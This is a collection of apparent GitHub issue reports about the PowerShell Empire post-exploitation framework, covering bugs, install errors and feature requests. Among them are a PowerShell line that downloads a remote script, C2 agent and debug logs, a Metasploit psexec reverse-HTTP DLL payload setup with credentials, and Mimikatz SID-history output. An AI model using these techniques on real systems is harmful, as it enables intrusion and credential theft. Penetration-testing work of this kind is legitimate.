I dont want to annoy but i'm just writing it to let you know. For me its not a big deal.
There is a new issue with the new psinject - the injection always inject ps2 even if the computer has ps4.

The do_set() command in empire.py sets ipblacklist rather than ipWhitelist when attempting to load the whitelist from a file.

On the other side, this can be CS problem, not Empire's.

Commit e62c586

When I use the latest empire version on kali 2.0, I get an agent, but I can't do anything with it. No modules work, not even trollsploit/message.
Target=(Windows 8.1, AV disabled, no firewall, language=Dutch)

Hey there,

I've been experimenting a bit with Empire and in my testing I was trying to run it with Kaspersky Internet Security 2016 enabled.
Apparently KIS 2016 is limiting the size of the scripts downloaded by System.Net.WebClient to 14409 bytes (as far as I could tell by manual testing), so if I deactivate it, everything goes smoothly but if I enable it, I get:

    Exception happened during processing of request from ('192.168.1.94', 49762)
    Traceback (most recent call last):
      File "/usr/lib/python2.7/SocketServer.py", line 295, in _handle_request_noblock
        self.process_request(request, client_address)
      File "/usr/lib/python2.7/SocketServer.py", line 321, in process_request
        self.finish_request(request, client_address)
      File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
        self.RequestHandlerClass(request, client_address, self)
      File "/usr/lib/python2.7/SocketServer.py", line 657, in __init__
        self.finish()
      File "/usr/lib/python2.7/SocketServer.py", line 716, in finish
        self.wfile.close()
      File "/usr/lib/python2.7/socket.py", line 279, in close
        self.flush()
      File "/usr/lib/python2.7/socket.py", line 303, in flush
        self._sock.sendall(view[write_offset:write_offset+buffer_size])

    error: [Errno 32] Broken pipe
    ----------------------------------------

on the empire C&C side and on the cmd.exe running the agent (e.g. launcher.bat), I get a hung console.

From my testing, doing:

$wc = New-Object System.Net.WebClient;
$wc.downloadstring("http://arandomhost.com/mycode.ps1");

works as long as the script is under 14409 bytes. If it's larger than 14409 bytes OR you replace HTTP with HTTPS on the downloadstring URL, you get

Exception calling "DownloadString" with "1" argument(s): "The underlying connec
tion was closed: An unexpected error occurred on a send."
At line:1 char:19
+ $wc.downloadstring <<<< ("https://arandomhost.com/mycode.ps1");
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : DotNetMethodException

It's also noteworthy that KIS throws NO alerts when blocking powershell downloads and as far as I could tell, there are no KIS threat log entries related to these events.
I'm not sure how to fix this, because powershell is listed as a "Trusted" application by KIS.
If KIS is blocking all HTTPS traffic by powershell (yes, even when injected into another process via PSInject) and due to Empire's whole HTTPS foundation, it's going to be tricky to bypass.
P.S. - Doing $wc.downloadstring() to servers with valid SSL certificates (i.e. Github) also fails with the same error.

Empire requires the m2crypto python library, but the installer does not add it. In addition, pip/easy_install both require swig (apt-get install swig) in order to build m2crypto dependencies

Close

Testing against the a FIPS enforced system produces a condition whereby agent.ps1 doesnt initialize properly due to restrictions on algorithms used (HMACMD5).

https://support.microsoft.com/en-us/kb/811833

-- Changing registry key fixed problem... but that wont be kosher :)

Running agent.ps1 in the current master:
New-Object : Exception calling ".ctor" with "0" argument(s): "This implementation
is not part of the Windows Platform FIPS validated cryptographic algorithms."
At line:373 char:31

•         $hmac = New-Object <<<<  System.Security.Cryptography.HMACMD5;
  

  • CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocatio
    nException
  • FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShe
    ll.Commands.NewObjectCommand

Property 'Key' cannot be found on this object; make sure it exists and is settable
.
At line:374 char:19

•         $hmac. <<<< Key = $encoding.GetBytes($SessionKey);
  

  • CategoryInfo : InvalidOperation: (Key:String) [], RuntimeException
  • FullyQualifiedErrorId : PropertyNotFound

You cannot call a method on a null-valued expression.
At line:375 char:42

•         $expected = $hmac.ComputeHash <<<< ($inBytes);
  

  • CategoryInfo : InvalidOperation: (ComputeHash:String) [], RuntimeE
    xception
  • FullyQualifiedErrorId : InvokeMethodOnNull

Compare-Object : Cannot bind argument to parameter 'DifferenceObject' because it i
s null.
At line:376 char:33

•         if (@(Compare-Object <<<<  $mac $expected -sync 0).Length -ne 0){
  

  • CategoryInfo : InvalidData: (:) [Compare-Object], ParameterBinding
    ValidationException
  • FullyQualifiedErrorId : ParameterArgumentValidationErrorNullNotAllowed,Micr
    osoft.PowerShell.Commands.CompareObjectCommand

Relevant logs and behavior observed:

agent.log
2015-08-27 02:17:38 :
[+] Agent ZTG4SEN2GCWYSZXN now active:
ps_version 2
old_uris None
jitter 0.0
servers None
internal_ip 10.1.0.129
working_hours
session_key [redacted]
children None
checkin_time 2015-08-27 02:17:38
hostname WIN764
delay 5
uris /admin/get.php,/news.asp,/login/process.jsp
username HAXME\testme4
kill_date
parent None
process_name powershell
listener http://10.1.0.1:8082/
sessionID ZTG4SEN2GCWYSZXN
process_id 3476
os_details Microsoft Windows 7 Enterprise
lost_limit 60
ID 1
name ZTG4SEN2GCWYSZXN
external_ip 10.1.0.129
headers
user_agent Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
lastseen_time 2015-08-27 02:17:38
high_integrity 0

2015-08-27 02:17:55 :
Tasked agent to run command ls

2015-08-27 02:18:01 :
Tasked agent to run command ps

2015-08-27 02:18:02 :
Tasked agent to run command tasklist

2015-08-27 02:18:03 :
Tasked agent to run command getpid

2015-08-27 02:18:04 :
Tasked agent to run command whoami

2015-08-27 02:18:06 :
Tasked agent to run shell command dir

2015-08-27 02:18:09 :
Tasked agent to run shell command whoami /all

debuglog:
2015-08-27 02:15:41 Empire : [] Empire starting up...
2015-08-27 02:16:27 EmpireServer : [!] Error starting listener on port 8081: [Errno 98] Address already in use
2015-08-27 02:16:40 EmpireServer : [] Initializing HTTP server on 8082
2015-08-27 02:17:38 HttpHandler : [] /index.asp requested from None at 10.1.0.129
2015-08-27 02:17:38 Agents : [] Sending stager (stage 1) to 10.1.0.129
2015-08-27 02:17:38 HttpHandler : [] Post to /index.jsp from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:38 Agents : [] Agent ZTG4SEN2GCWYSZXN from 10.1.0.129 posted to public key URI
2015-08-27 02:17:38 Agents : [] Agent ZTG4SEN2GCWYSZXN from 10.1.0.129 posted valid RSA key
2015-08-27 02:17:38 HttpHandler : [] Post to /index.php from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:38 Agents : [] Sending agent (stage 2) to ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:38 Agents : [+] Initial agent ZTG4SEN2GCWYSZXN from 10.1.0.129 now active
2015-08-27 02:17:43 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:48 HttpHandler : [] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:53 HttpHandler : [] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:17:55 Agents : [] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:17:58 HttpHandler : [] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:01 Agents : [] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:02 Agents : [] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:03 Agents : [] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:04 HttpHandler : [] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:04 Agents : [] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:06 Agents : [] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:09 Agents : [] Tasked ZTG4SEN2GCWYSZXN to run TASK_SHELL
2015-08-27 02:18:10 HttpHandler : [] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:15 HttpHandler : [] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:20 HttpHandler : [] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:25 HttpHandler : [] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:30 HttpHandler : [] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:35 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:40 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:45 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:50 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:18:55 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:00 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:05 HttpHandler : [] /login/process.jsp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:10 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:15 HttpHandler : [] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:20 HttpHandler : [] /news.asp requested from ZTG4SEN2GCWYSZXN at 10.1.0.129
2015-08-27 02:19:25 HttpHandler : [*] /admin/get.php requested from ZTG4SEN2GCWYSZXN at 10.1.0.129

Hey guys,

First of all, thank you for this tool. I have been using it pretty frequently since its release and I've been finding it quite useful. However, I did notice something funky with the credential reporting. When running the "mimikatz" command from an agent context, all the credentials are reported correctly, as expected.

However, when running the "creds" command the same password in the above image is reported incorrectly. I didn't dive into the code to see whats really happening, but I thought maybe it was truncating the output due to the ":" in the password.

Unfortunately, I can't provide too much information as this is from a client engagement, however if you need any assistance recreating the issue, I'll provide whatever help I can.

Note sure how I'm supposed to put quotes in modules, is there a trick to it?

(Empire: persistence/misc/add_sid_history) > set Groups "Domain Admins"
(Empire: persistence/misc/add_sid_history) > run
[>] Module is not opsec safe, run? [y/N] y
(Empire: persistence/misc/add_sid_history) >
Job started: Debug32_vzw3x

Hostname: DC1.sittingduck.info / authority\system-authority\system
  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 23 2015 23:05:23)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 16 modules * * */


mimikatz(powershell) # misc::addsid notanadmin
ERROR kuhl_m_misc_addsid ; It requires at least 2 args

mimikatz(powershell) # Domain
ERROR mimikatz_doLocal ; "Domain" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file output/base64 output
         version  -  Display some version informations
              cd  -  Change or display current directory
        markruss  -  Mark about PtH

mimikatz(powershell) # Admins
ERROR mimikatz_doLocal ; "Admins" command of "standard" module not found !

Module :        standard
Full name :     Standard module
Description :   Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file output/base64 output
         version  -  Display some version informations
              cd  -  Change or display current directory
        markruss  -  Mark about PtH

I don't seem to be able to give this a label, but to be clear this is a feature request/enhancement.

It would be useful to me to have the ability to issue a command in the agents context to remove agents with a checkin_time older than X.

Ultimately I would like to be able to automatically assign my agent(s) some metadata in the agent list related to how long since they last checked in, something along the lines of a staleness scale. The next logical progression would be performing batch operations (killing them, running a module on them, etc) on collections of agents using their staleness as a selector.

All I get is a "Job started: Debug32_randomchars"

Is there somewhere I can look for logging of why it's not working?

It works perfectly on win8 but on win7 it's not even start the dll...
Any help?

It'd be nice to have a way to automatically run a script or two when a new session comes in. Is there any way to do this already?

Hi on initial install Empire was working fine, not sure what has changed or if its a kali/python issue:
checked that I've got the latest pull from git also tried googling with no luck a point in the right direction would be greatly appreciated:

root@kali:/opt/Empire# ls
changelog data empire lib LICENSE README.md setup
root@kali:/opt/Empire# ./empire
Traceback (most recent call last):
File "./empire", line 6, in
from lib.common import empire
File "/opt/Empire/lib/common/empire.py", line 15, in
from pydispatch import dispatcher
ImportError: No module named pydispatch
root@kali:/opt/Empire# python -V
Python 2.7.3
root@kali:/opt/Empire# pip install pydispatch
Requirement already satisfied (use --upgrade to upgrade): pydispatch in /usr/local/lib/python2.7/dist-packages
Requirement already satisfied (use --upgrade to upgrade): colorama>=0.2.7 in /usr/local/lib/python2.7/dist-packages (from pydispatch)
Requirement already satisfied (use --upgrade to upgrade): six>=1.5.2 in /usr/local/lib/python2.7/dist-packages (from pydispatch)
Cleaning up...
root@kali:/opt/Empire# pip install pydispatch --upgrade
Requirement already up-to-date: pydispatch in /usr/local/lib/python2.7/dist-packages
Requirement already up-to-date: colorama>=0.2.7 in /usr/local/lib/python2.7/dist-packages (from pydispatch)
Requirement already up-to-date: six>=1.5.2 in /usr/local/lib/python2.7/dist-packages (from pydispatch)
Cleaning up...
root@kali:/opt/Empire#

how can I make an auto download script that search for specifies file and download it automaticly

This is more of a question. Just curious. In testing within an environment where powershell is blacklisted, I can get the agent deployed via reflective dll injection. However, I have had limited success with some of the modules. For example, screenshot works but keylogger does not (I get software restriction policy block event in eventlog for powershell.exe). Just curious what modules were "powershell without powershell" friendly. Is Empire a viable solution in a "powershell blacklisted" environment? Thanks!

is there a way to send a payload (bat/cmd) that will install or repair the .net files?

According to the site the cert.sh should be under data: The provided ./data/cert.sh script will generate a self-signed cert and place it in ./data/empire.pem. - it's under the setup directory

Much like Metasploit has their .msf4/modules directory, it would be nice if there was a way for custom modules to be loaded outside of Empire so I don't have to dirty up my Empire directory with all my janky powershell code ;-)

Hi Guys
I'm finding issues using the generated dll payload with msf, I've generated the dll payload and set up a listener within Empire.
I've setup msf to deploy the dll via psexec, below are the msf options and the error message I receive, regardless of the stager being x86 or x64 and the OS being x86 or x64

Any help if I'm being dumb and doing the wrong thing or I can help in any way with debugging.

Dave

Module options (exploit/windows/smb/psexec):

Name Current Setting Required Description

RHOST 192.168.0.110 yes The target address
RPORT 445 yes Set the SMB service port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass Pa55w0rd2013 no The password for the specified username
SMBUser dave no The username to authenticate as

Payload options (windows/dllinject/reverse_http):

Name Current Setting Required Description

DLL /tmp/launcher.dll yes The local path to the Reflective DLL to upload
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.0.243 yes The local listener hostname
LPORT 443 yes The local listener port

Exploit target:

Id Name

0 Automatic

2015-08-09 21:35:47 +0100 S:0 J:0 IP:192.168.0.243 msf exploit(psexec) > exploit

[] Started HTTP reverse handler on http://0.0.0.0:443/
[] Connecting to the server...
[] Authenticating to 192.168.0.110:445 as user 'dave'...
[] Uploading payload...
[] Created \ngPAKreH.exe...
[+] 192.168.0.110:445 - Service started successfully...
[] Deleting \ngPAKreH.exe...
[*] 192.168.0.110:1251 (UUID: 7ba205fb173a7163/x86=1/windows=1/2015-08-09T20:35:59Z) Staging Native payload ...
[-] Exception handling request: wrong number of arguments (1 for 0)

Hi Guys,

this isn't an issue more me asking a question about Empire and your plans for it.
Me and a friend wrote and got this into Metasploit; https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/
And one of the guys at Trusted Sec wrote about it too - https://www.trustedsec.com/june-2015/interactive-powershell-sessions-within-meterpreter/

My thoughts were that the shell might be useful inside of Empire.
The main part of the shell is really just a powershell script that Metasploit deploys as a payload.
Would this fit with your plans for Empire?

Thanks

Dave

When a credential is discovered by keylooging, searching Netlogon or other method I would like an easy way to put that into the credential store manually. OR
allow user to optionally specify credentials to be used for lateral/invoke_psexec, manage/psinject as well as manage/inject_wmi. This would also allow you to specify credential and spread to targets where only port 445 is accessible.

Also, please allow ComputerName to be an optional field for manage\psinject. I popped a non-administrator, keylogged the local admin, then wanted to specify the admin creds and manage/psinject into the same host to privilege escalate the agent. However, if you use Invoke-WmiMethod (as I am sure this method does) and specify the -ComputerName argument you will get a "User credentials cannot be use for local connections" error. (and remotely executing it to escalate isn't always an option because of UAC AccountTokenFilterPolicy)

Have I told you lately that you guys are awesome? Thanks!

I wanted to run under the Windows of the item

Although it is strange, but valuable

I like Empire, it is really good

"list stale" command issued when no stale agents are present

after rebooting the agent box and waiting a minute

I could easily say that's a semantic issue, but my first reaction was, oh noe my agents are gone. A message along the lines of, "No currently stale agents", or something along those lines might be a little more appropriate.

thanks for the great tool !
I tested the keylogger module today and get a lot of incorrect characters.
Windows was running in Virtualbox and the keyboard was German.
Empire was running in Kali but virtual with Parallels Desktop for mac.
Maybe thats the problem ?
My input was twitter.com and im getting itter.com
or input was google.com and i was getting googgle.com.

Currently there isn't a very simple way to change the stager URLs. It would be nice to have the ability in the UI to change these and hopefully even to so per-listener.

https://github.com/PowerShellEmpire/Empire/blob/3cedb106a999c5f443e68952f65abb4b44ea3033/lib/common/helpers.py#L364

socket.gethostbyname(socket.gethostname())

Can throw:

socket.gaierror: [Errno -2] Name or service not known

Best case is to probably wrap in try/except and proceed into the block of logic below:

    if ip.startswith("127.") and os.name != "nt":
        interfaces = ["eth0","eth1","eth2","wlan0","wlan1","wifi0","ath0","ath1","ppp0"]
        for ifname in interfaces:
            try:
                ip = get_interface_ip(ifname)
                if ip != "":
                    break
            except:
                print "Unexpected error:", sys.exc_info()[0]
                pass

Type in "usestager h" or "usestager l". It's wanting to tab-complete the word "listener" instead of the various stagers

Testing Empire against Windows 7 Enterprise 64-bit. The initial powershell agent works fine and I get a powershell agent running as a domain user that's a member of the local Administrators groups on this system. powerup/allchecks works fine against that agent and confirms I have local admin rights showing "Current user already has local administrative privileges". Running bypassuac works fine and reports "Not in a medium integrity process" and bypassuac_wscript reports "You are already elevated", so it seems I already have the appropriate high integrity privileges. Running ps works fine as well, however when I try to psinject into a listed process with "nt authority/system" privileges, psinject starts the job, but I never get a call back with a new agent. Same result if I psinject into another process that my user owns. I seem to have all the appropriate .NET pre-reqs in the reg entry that was listed in another thread: v2.0.x, v3.0, v3.5, v4, & v4.0.

I added code to bypassuac (Invoke-BypassUAC) to provide an additional message in the console if "whoami /groups" has a "High Mandatory Level" group permission and indeed it does. I believe this is also indicated by the asterisk prepending the username in the agents view, which it is as well. In that case, psinject (Invoke-PSInject) should have sufficient privileges to function, however when it executes against an agent, it starts the job, but nothing comes back. I've tried this with a few different test Win7 Enterprise 64-bit targets with same result.

Any ideas?

Hello, at first, let me thank you, this is very nice software to play with.
I had an idea that it might be quite easy to add some client recognition features, it's quite annoying that every time the powershell starts it creates new agent.
I think it should be possible write name to registry and then check that entry every time powershell (or other infected program) runs and send it to empire master.
Would it be possible?

#40 for reference

After discussion with @gentilkiwi found out there is a /dc option for DCsync that works perfectly.

So:
Feature: add the /dc option for the DCSync module but leave it as not required
Bug: Figure out why the Job never finishes and just hangs in the job queue

I can't see a way to add credentials manually (if retrieved through other means)

Will look at the database to see if I can add manually through there in the mean time

empire does not give a notification in case an agent dies or stops calling home

just like msfconsole , pupy remote admin tool, cobaltstrike
will be good to know when an agents dies
so i dont send commands to dead agents and when we dont get response we start thinking i have been block or network

When running the "setup_database.py" according to the website http://www.powershellempire.com/?page_id=110 the path to the empire.db is incorrect.

~/empire# python setup/setup_database.py

 [>] Enter server negotiation password, enter for random generation:
Traceback (most recent call last):
  File "setup/setup_database.py", line 76, in <module>
    conn = sqlite3.connect('../data/empire.db')
sqlite3.OperationalError: unable to open database file
root@python:~/empire#

I understand keeping around credentials that are the same but retrieved from two different source hosts (kinda), but if all other fields other that the ID and time field are the same it should probably just drop it from the listing so as not to clutter up the output

  DefaultProfile    True        /a.asp,/b.asp,/c.asp|Moz        Default communication profile for the agent.
                                illa/5.0 (compatible; MSIE 10.0;
                                Windows NT 7.0; InfoPath.3; .NET
                                CLR 3.1.40767; Trident/6.0; en-
                                US)

Setting results in failed staging (launcher stager still tries to pull index.asp, then index.php and index.jsp)

in the description of the file parameter on line 29, we get ' 'Description' : 'File to output .bat launcher to, otherwise displayed on the screen.','
but would prefer ' 'Description' : 'File to output .vbs launcher to, otherwise displayed on the screen.',

Hi,

I've been testing this while trying to work through a proxy server.

As a normal user the agent correctly picks up the proxy settings from Internet Explorer and calls back.

When trying to run the agent as System it fails as there are no proxy settings set for the System user. When setting the proxy details manually the stager uses them correctly and sets up the agent; however, the agent does not use the manual proxy settings and is unable to communicate with the server.

Basically I'm left with an agent that never updates and only responds to the 'info' command.

I had a very quick look through the code in agent.ps1 and it looks as if it is never passed the manual proxy settings.

This looks like a awesome tool that will be very useful.

Hello,

Very good project. Thank you :)

Is it possible to generate a Bind Powershell Loader (One-liner) with Empire? (and not a Reverse Loader)

In some case, a firewall can be between the target and the auditor with connection initializations from the target to the auditor's machine blocked.

I have not found this Bind feature in your project.

Thank you in advance,

In this great blog post: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/ is the following quote:

Then we need the SID of the forest root. I’m sure there are better ways to do this, but one easy one is to resolve the ‘krbtgt’ account for the domain:

(New-Object System.Security.Principal.NTAccount("testlab.local","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value

This method for getting the forest root SID from a child domain requires running the above one-liner powershell command. Is there a way to run this one-liner from inside Empire against one of the agents? Or another option, can this one-liner be incorporated into the existing module situational_awareness/network/powerview/get_forest_domain?

It exports the certs, but not sure if it goes to a local directory or where. I can't find them on my attack box and there isn't a way to interface with the file system easily from the agents menu that I can tell in order to find the files on target.

show [!] Error: module produced an empty script

because needed required variables are set to false
how do i set it to true

Hi!
I am planning to play around with this cool tool in the Offensive Security Labs.
I started to test this tool yesterday but ran into problems regarding the communication between the server and "client".
I have generated the .bat file stager and launched it on a Windows 7 box.
I already have the server started on my Kali Linux box (no firewall) and I have a listener started as well.

After I run the stager on the Windows 7 box it connects to my listener/server and all looks fine.
The problem is that the only command I can run that works is "info" when I try to interact with the client. Also, I can not see any useful info in the client folder on the server.

(Empire: agents) > interact MWVMCKCYUSSAZBEH
(Empire: MWVMCKCYUSSAZBEH) >
(Empire: MWVMCKCYUSSAZBEH) > info

Every other command I try to run results in no response now matter how long I wait.
The client status looks fine, it is connected and looks ok as far as I can see.
I have tried to restart the server and run another client session but the result is the same, I have also turned off the Win 7 firewall in case it was causing any problems, but no difference.

When I tried to troubleshoot the problem I could see this:
-If I run netstat on my Win 7 box I can't see any connection between the client and the server (Kali Linux machine)
-I have started Empire in debug mode and looked at the logs and it looks like the client is asking for status on a regular basis(?), but the client does not respond to any commands/tasks.
It looks like this in the logs:
2015-09-28 11:59:05 HttpHandler : [] /news.asp requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:11 HttpHandler : [] /login/process.jsp requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:13 Agents : [] Tasked MWVMCKCYUSSAZBEH to run TASK_SHELL
2015-09-28 11:59:16 HttpHandler : [] /admin/get.php requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:21 HttpHandler : [] /login/process.jsp requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:27 HttpHandler : [] /admin/get.php requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:32 HttpHandler : [] /login/process.jsp requested from MWVMCKCYUSSAZBEH at 192.168.31.118
2015-09-28 11:59:37 HttpHandler : [] /login/process.jsp requested from MWVMCKCYUSSAZBEH at 192.168.31.118

[*] Active agents:

Name Internal IP Machine Name Username Process Delay Last Seen

MWVMCKCYUSSAZBEH 192.168.31.118 OFFSEC-LAB *offsec-lab\offsec powershell/2640 5/0.0 2015-09-28 08:24:37

This is the agent info:
[*] Agent info:

ps_version          2
old_uris            None
jitter              0.0
servers             None
internal_ip         192.168.31.118
working_hours       
session_key         4d[}Y<MN$Bv:xIG=LSPH56\)(Tif1`0X
children            None
checkin_time        2015-09-28 07:10:54
hostname            OFFSEC-LAB
delay               5
uris                /admin/get.php,/news.asp,/login/process.jsp
username            offsec-lab\offsec
kill_date           
parent              None
process_name        powershell
listener            http://192.168.30.89:8080/
sessionID           MWVMCKCYUSSAZBEH
process_id          2640
os_details          Microsoft Windows 7 Professional N
lost_limit          60
ID                  1
name                MWVMCKCYUSSAZBEH
external_ip         192.168.31.118
headers             
user_agent          Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
lastseen_time       2015-09-28 08:25:46
high_integrity      1

Do you know what could be the problem?

Trying to install Empire under MacOSX v10.10.4
read the install.sh script to see what the dependencies are
installed what was missing.
when I launch empire I get:
MANDIANT> ../empire
Traceback (most recent call last):
File "../empire", line 6, in
from lib.common import empire
File "/Applications/GITLIST-PACKAGES/Empire/lib/common/empire.py", line 22, in
import http
File "/Applications/GITLIST-PACKAGES/Empire/lib/common/http.py", line 18, in
import encryption
File "/Applications/GITLIST-PACKAGES/Empire/lib/common/encryption.py", line 12, in
import base64, hashlib, hmac, string, M2Crypto
File "build/bdist.macosx-10.10-intel/egg/M2Crypto/init.py", line 24, in
File "build/bdist.macosx-10.10-intel/egg/M2Crypto/ASN1.py", line 12, in
File "build/bdist.macosx-10.10-intel/egg/M2Crypto/BIO.py", line 221, in
File "build/bdist.macosx-10.10-intel/egg/M2Crypto/BIO.py", line 227, in CipherStream
AttributeError: 'module' object has no attribute 'PKCS5_SALT_LEN'

was hoping you could smack me in the head and tell me what stupid thing I've done (other than trying to run it under MacOSX of course ;-)

Using latest commit (671635a) and installed all required dependencies for Ubuntu 14.04 x86_64. Agents connect to listener, but the only command that actually outputs is "info". Tcpdump shows activity when issuing other interactive agent commands but output is never displayed.